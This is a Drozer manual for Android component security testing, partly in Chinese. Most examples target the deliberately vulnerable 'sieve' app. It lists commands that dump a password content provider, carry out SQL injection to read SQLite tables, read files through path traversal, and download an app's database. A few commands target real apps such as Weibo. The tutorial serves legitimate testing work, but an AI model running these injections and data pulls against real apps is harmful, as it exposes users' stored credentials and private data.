Drozer User Manual

Installation and startup of the Drozer tool: source code address (https://github.com/mwrlabs/drozer/) 1.
Installation
(1) Download  https://www.mwrinfosecurity.com/products/drozer/community-edition/Mac
You can download the python version
(2) Install drozer on the PC:
sudo easy_install --allow-hosts pypi.python.org protobuf==2.4.1
easy_install twisted==10.2.0 (to support Infrastructure mode)
sudo easy_install ./drozer -2.3.4-py2.7.egg
(3) Install agent.apk on the Android device
adb install agent.apk
2. Start
(1) Use adb on the PC for port forwarding, and forward to the port used by Drozer ❝31415
adb forward tcp:31415 tcp:31415
(2) Open the Drozer Agent on the Android device and select embedded server-enabled
(3) Open the Drozer Console on the PC
drozer console connect

 

1. Android component security testing

1. Get the package name
dz > run app.package.list -f sieve

com.mwr.example.sieve

2. Get the basic information of the app

run app.package.info -a com.mwr.example.sieve

3. Determine the attack surface

run app.package.attacksurface com.mwr.example.sieve

4.Activity

(1) Get activity information

run app.activity.info -a com.mwr.example.sieve

(2) Start the activity

run app.activity.start --component com.mwr.example.sieve

dz> help app.activity.start

usage: run app.activity.start -h --action ACTION --category CATEGORY

--component PACKAGE COMPONENT --data-uri DATA_URI

--extra TYPE KEY VALUE [--flags FLAGS FLAGS ...]

--mimetype MIMETYPE

5.Content Provider

(1) Get Content Provider information

run app.provider.info -a com.mwr.example.sieve

(2) Content Providers (data leakage)

First get all accessible Uri:

run scanner.provider.finduris -a com.mwr.example.sieve

Get data for each Uri:

run app.provider.query

content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
query data indicates that there is a vulnerability

(3) Content Providers (SQL injection)

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

报错则说明存在SQL注入。

列出所有表：

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ -projection "* FROM SQLITE_MASTER WHERE type='table';-"

获取某个表（如Key）中的数据：

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ -projection "* FROM Key;-"

（4）同时检测SQL注入和目录遍历

run scanner.provider.injection -a com.mwr.example.sieve

run scanner.provider.traversal -a com.mwr.example.sieve

6.Service

（1）获取service详情

run app.service.info -a com.mwr.example.sieve

不使用drozer启动service

am startservice --n 包名/service名

7.Broadcast Receiver

app.broadcast.info 获取broadcast receivers信息

app.broadcast.send 通过intent发送broadcast receiver

 

 

全部命令：

list  //列出目前可用的模块，也可以使用ls
> help app.activity.forintent       //查看指定模块的帮助信息
> run app.package.list      //列出android设备中安装的app
> run app.package.info -a com.android.browser       //查看指定app的基本信息
> run app.activity.info -a com.android.browser      //列出app中的activity组件
> run app.activity.start --action android.intent.action.VIEW --data-uri  http://www.google.com  //开启一个activity，例如运行浏览器打开谷歌页面
> run scanner.provider.finduris -a com.sina.weibo       //查找可以读取的Content Provider
> run  app.provider.query content://settings/secure --selection "name='adb_enabled'"    //读取指定Content Provider内容
> run scanner.misc.writablefiles --privileged /data/data/com.sina.weibo     //列出指定文件路径里全局可写/可读的文件
> run shell.start       //shell操作
> run tools.setup.busybox       //安装busybox
> list auxiliary        //通过web的方式查看content provider组件的相关内容
> help auxiliary.webcontentresolver     //webcontentresolver帮助
> run auxiliary.webcontentresolver      //执行在浏览器中以http://localhost:8080即可访问
以sieve示例
> run app.package.list -f sieve         //查找sieve应用程序
> run app.package.info -a com.mwr.example.sieve         //显示app.package.info命令包的基本信息
> run app.package.attacksurface com.mwr.example.sieve   //确定攻击面
> run app.activity.info -a com.mwr.example.sieve         //获取activity信息
> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList     //启动pwlist
> run app.provider.info -a com.mwr.example.sieve        //提供商信息
> run scanner.provider.finduris -a com.mwr.example.sieve        //扫描所有能访问地址 
>run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/--vertical  //查看DBContentProvider/Passwords这条可执行地址
> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"   //检测注入
> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts    //查看读权限数据
> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db //下载数据
> run scanner.provider.injection -a com.mwr.example.sieve       //扫描注入地址
> run scanner.provider.traversal -a com.mwr.example.sieve
> run app.service.info -a com.mwr.example.sieve         //查看服务